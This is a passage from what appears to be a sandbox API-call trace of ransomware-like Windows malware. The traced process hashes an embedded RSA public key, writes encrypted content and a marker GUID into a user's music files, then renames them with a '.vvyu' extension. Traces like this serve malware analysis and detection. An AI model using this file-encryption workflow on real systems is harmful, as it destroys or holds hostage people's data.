KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.137] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.137] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0201.138] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.138] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.139] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.139] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.139] GetLastError () returned 0x0 [0201.139] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.139] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0201.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.139] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.139] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.139] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3230) returned 0x2ea99b0 [0201.140] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fc00 [0201.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33b0 [0201.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fc48 [0201.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33c8 [0201.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33f8 [0201.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3458 [0201.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3410 [0201.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.141] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0201.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0201.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3458 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3410 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea33f8 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0201.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0201.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0201.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.144] GetCurrentThreadId () returned 0x66c [0201.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8508 [0201.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.144] GetCurrentThreadId () returned 0x66c [0201.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3458 [0201.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33f8 [0201.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3410 [0201.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33e0 [0201.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3470 [0201.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0201.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3440 [0201.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3428 [0201.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3488 [0201.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3428 [0201.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0201.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33f8 [0201.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0201.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0201.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0201.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0201.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0201.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0201.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0201.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fc48 | out: hHeap=0x620000) returned 1 [0201.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.157] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x3229, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x3229, lpOverlapped=0x0) returned 1 [0201.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.158] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x322e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.158] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.159] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.160] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.160] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.160] CloseHandle (hObject=0x510) returned 1 [0201.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0201.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0201.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0201.162] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\-AHHgkVlxn_KxD.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\-ahhgkvlxn_kxd.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\-AHHgkVlxn_KxD.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\-ahhgkvlxn_kxd.m4a.vvyu")) returned 1 [0201.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.164] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0201.167] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe54cb470, ftCreationTime.dwHighDateTime=0x1d8a3e4, ftLastAccessTime.dwLowDateTime=0x3f46080, ftLastAccessTime.dwHighDateTime=0x1d8a6dd, ftLastWriteTime.dwLowDateTime=0x3f46080, ftLastWriteTime.dwHighDateTime=0x1d8a6dd, nFileSizeHigh=0x0, nFileSizeLow=0x93c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="02RH90y7ReBgxW.mp3", cAlternateFileName="02RH90~1.MP3")) returned 1 [0201.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6ead8 [0201.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.167] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\02RH90y7ReBgxW.mp3") returned=".mp3" [0201.167] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\02RH90y7ReBgxW.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\02rh90y7rebgxw.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.168] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=37828) returned 1 [0201.168] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.171] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x939e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.171] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, 